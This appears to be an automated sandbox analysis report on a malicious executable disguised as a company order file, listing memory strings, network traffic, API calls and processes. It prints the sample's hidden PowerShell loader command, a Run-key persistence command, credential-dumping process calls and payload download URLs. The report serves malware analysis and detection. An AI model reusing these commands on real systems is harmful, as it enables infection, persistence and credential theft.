Source: msiexec.exe, 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpxe?
Source: Company Profile and new order-202401127.scr.exe, Company Profile and new order-202401127.scr.exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2611130783.00000000062C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhv7A62.tmp.10.dr | String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.2608136076.0000000005261000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msiexec.exe, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com
Source: msiexec.exe, msiexec.exe, 0000000C.00000003.2864612972.000000000366D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2864688623.000000000366E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2864652580.000000000366D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2865411974.000000000366E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.com
Source: msiexec.exe, 0000000C.00000003.2864612972.000000000366D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2864688623.000000000366E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000003.2864652580.000000000366D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2865411974.000000000366E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.comata
Source: msiexec.exe, 00000006.00000002.3321265008.0000000022F20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: msiexec.exe, 00000006.00000002.3321265008.0000000022F20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comr
            Source: msiexec.exe, 0000000A.00000002.2878388474.0000000002FF4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
            Source: msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: powershell.exe, 00000002.00000002.2608136076.0000000005261000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBeq
            Source: powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: powershell.exe, 00000002.00000002.2611130783.00000000062C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000002.00000002.2611130783.00000000062C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000002.00000002.2611130783.00000000062C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: msiexec.exe, 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/
            Source: msiexec.exe, 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2722098799.0000000006BB4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3307439894.0000000006B44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/data-package/a8AChfye/download
            Source: msiexec.exe, 00000006.00000003.2759594214.0000000006BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/data-package/a8AChfye/download9
            Source: msiexec.exe, 00000006.00000002.3307439894.0000000006B1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/data-package/a8AChfye/download_
            Source: msiexec.exe, 00000006.00000002.3307439894.0000000006B1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/data-package/a8AChfye/downloadg
            Source: powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: msiexec.exe, 0000000A.00000002.2878491403.000000000328F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.c5z
            Source: msiexec.exe, 0000000A.00000002.2878491403.000000000325A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: msiexec.exe, 0000000A.00000002.2878491403.000000000328F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_deskt
            Source: msiexec.exe, 0000000A.00000002.2878491403.000000000325A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: msiexec.exe, 0000000A.00000002.2878738738.000000000349A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2878129912.000000000349A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2878491403.000000000325A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: msiexec.exeString found in binary or memory: https://login.yahoo.com/config/login
            Source: powershell.exe, 00000002.00000002.2611130783.00000000062C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: msiexec.exe, 00000006.00000003.2813346419.0000000006BB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s25.filetransfer.io/
            Source: msiexec.exe, 00000006.00000003.2722098799.0000000006BB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s25.filetransfer.io/5
            Source: msiexec.exe, 00000006.00000003.2721993608.0000000006BDC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2722098799.0000000006BB4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3307439894.0000000006B44000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3307439894.0000000006BDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s25.filetransfer.io/storage/download/Yo8ryWgWZnzn
            Source: msiexec.exe, 00000006.00000003.2759594214.0000000006BB4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2722098799.0000000006BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s25.filetransfer.io/storage/download/Yo8ryWgWZnzn2024
            Source: msiexec.exe, 00000006.00000003.2722098799.0000000006BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s25.filetransfer.io/storage/download/Yo8ryWgWZnzntorage/download/Yo8ryWgWZnzn
            Source: msiexec.exe, msiexec.exe, 0000000C.00000002.2864936932.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
            Source: unknownHTTPS traffic detected: 104.21.13.139:443 -> 192.168.2.5:49807 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.13.139:443 -> 192.168.2.5:49813 version: TLS 1.2
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeCode function: 0_2_004056E5 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056E5
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,10_2_0040987A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,10_2_004098E2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_00406DFC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,11_2_00406E9F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_004068B5
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,12_2_004072B5

E-Banking Fraud

Source: Yara match | File source: 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2813346419.0000000006BB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 1292, type: MEMORYSTR

System Summary

Source: initial sample | Static PE information: Filename: Company Profile and new order-202401127.scr.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Company Profile and new order-202401127.scr.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process Stats: CPU usage > 49%
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00401806 NtdllDefWindowProc_W
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_004018C0 NtdllDefWindowProc_W
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_004016FD NtdllDefWindowProc_A
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_004017B7 NtdllDefWindowProc_A
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00402CAC NtdllDefWindowProc_A
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00402D66 NtdllDefWindowProc_A
Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Code function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Code function: 0_2_00406C3F
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_22F5B5C1
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 6_2_22F67194
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0044B040
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0043610D
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00447310
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0044A490
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0040755A
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0043C560
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0044B610
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0044D6C0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_004476F0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0044B870
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0044081D
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00414957
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_004079EE
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00407AEB
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0044AA80
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00412AA9
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00404B74
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00404B03
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0044BBD8
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00404BE5
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00404C76
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00415CFE
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00416D72
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00446D30
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00446D8B
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00406E8F
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00405038
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0041208C
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_004050A9
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0040511A
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0043C13A
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_004051AB
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00449300
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0040D322
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0044A4F0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0043A5AB
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00413631
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00446690
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0044A730
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_004398D8
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_004498E0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0044A886
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0043DA09
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00438D5E
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00449ED0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_0041FE83
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 11_2_00430F54
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_004050C2
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_004014AB
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00405133
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_004051A4
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00401246
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_0040CA46
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00405235
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_004032C8
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00401689
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00402F60
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 004165FF appears 35 times
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 00422297 appears 42 times
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 00413025 appears 79 times
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 00416760 appears 69 times
Source: Company Profile and new order-202401127.scr.exe, 00000000.00000002.2088255339.0000000000467000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebigottes.exeDVarFileInfo$ vs Company Profile and new order-202401127.scr.exe
Source: Company Profile and new order-202401127.scr.exe | Binary or memory string: OriginalFilenamebigottes.exeDVarFileInfo$ vs Company Profile and new order-202401127.scr.exe
Source: Company Profile and new order-202401127.scr.exe.2.dr | Binary or memory string: OriginalFilenamebigottes.exeDVarFileInfo$ vs Company Profile and new order-202401127.scr.exe
Source: Company Profile and new order-202401127.scr.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)"
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@17/15@3/3
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Code function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 12_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Code function: 0_2_00404991 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Code function: 0_2_004021AF CoCreateInstance
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource
Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | File created: C:\Users\user\Videos\Systemsikkerhed.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-NJ8CFR
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2724:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_03
Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | File created: C:\Users\user\AppData\Local\Temp\nss3966.tmp
Source: Company Profile and new order-202401127.scr.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\msiexec.exe | System information queried: HandleInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: msiexec.exe, msiexec.exe, 0000000B.00000002.2864120146.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: msiexec.exe, 00000006.00000002.3320063164.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: msiexec.exe, 0000000A.00000003.2877936776.0000000004DC1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2878841910.0000000004DCC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: msiexec.exe, msiexec.exe, 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: Company Profile and new order-202401127.scr.exe | Virustotal: Detection: 13%
Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | File read: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe
Source: C:\Windows\SysWOW64\msiexec.exe | Evasive API call chain: __getmainargs,DecisionNodes,exitgraph_11-33236
Source: unknown | Process created: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe "C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe"
Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Vagtselskabets=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Burglarproofs\bordskaaneren.Exp';$wullawins=$Vagtselskabets.SubString(21189,3);.$wullawins($Vagtselskabets)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kyeljthgepgkbumddfxbvgcpb"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\nsjeklaasxzpdjihuqsuylwgkeqq"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xmowlwlbgfrcopwtdaewjyjptlizvdg"
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: oleacc.dll
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exe | Section loaded: shfolder.dll
